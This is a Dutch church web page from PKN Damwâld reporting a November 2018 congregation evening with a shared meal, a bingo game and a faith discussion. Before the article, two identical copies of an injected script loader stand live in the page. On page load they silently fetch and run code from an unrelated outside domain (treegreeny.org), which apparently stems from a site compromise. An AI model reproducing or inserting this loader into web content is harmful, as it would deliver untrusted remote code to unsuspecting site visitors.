;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wijk 2, verbindingsavond - PKN Damwâld

Wijk 2, verbindingsavond

Gepubliceerd op: woensdag 21 november 2018

Een warme deken

Rond etenstijd druppelen de broeders en zusters van wijk 2 binnen. De reuk van het warm eten is aanwezig en op de beamer wordt muziek gedraaid van Nederland Zingt Dag 2018. Robert Colijn heet iedereen welkom en onder begeleiding van Robert zingen wij: Wat een vriend is onze Jezus. In het gebed bidden wij voor het verbinden, liefde, wijsheid, geloof en wederzijds vertrouwen.

 

 

Het eten bestond uit diverse soorten stamppot. Het eten was prima en de pannen waren binnen de koste tijd leeg. Vervolg door een toetje. Ook het opruimen van de tafel ging met elkaar. Volgens sommigen in een zucht en een skeet opgeruimd.

Hierna volgde er een speciaal bingo spel waar iedereen elkaar moest bevragen om hiermee het snelste Bingo te krijgen. Om half acht was de koffie klaar en was het thema: Met Hart en Ziel aan de beurt. Vanuit het thema was er een goede discussie. Strekking was: door middel van een gesprek en wederzijds vertrouwen kunnen wij verder bouwen aan het huis van onze Here God. Opvallend was de kerkelijke opvoeding van na de oorlog, waarbij een strenge opvoeding en weinig ruimte voor gesprek aan de orde was terwijl de jeugd van deze tijd vraagt om duidelijkheid en de jeugd heeft ruimte voor gesprek. Misschien is het een optie om de jeugd en ouderen bij elkaar te krijgen om te spreken over geloof van deze tijd en vroeger.

Al met al een warme bijeenkomst en ook het eten met elkaar verbindt. Wij hebben elkaar nodig voor persoonlijke groei in het geloof en gezamenlijk voor de opbouw van de Kerk.

Bedankt voor ieders inbreng.

(geschreven door een gemeentelid welke de avond zo heeft ervaren).